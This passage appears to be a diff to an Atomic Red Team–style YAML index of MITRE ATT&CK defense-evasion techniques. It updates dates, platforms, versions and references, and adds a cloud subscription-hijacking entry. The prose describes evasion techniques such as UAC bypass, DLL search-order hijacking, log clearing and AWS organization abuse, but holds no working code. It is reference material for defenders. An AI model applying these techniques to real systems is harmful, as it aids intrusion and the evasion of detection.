+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2404,8 +2473,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2484,8 +2550,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
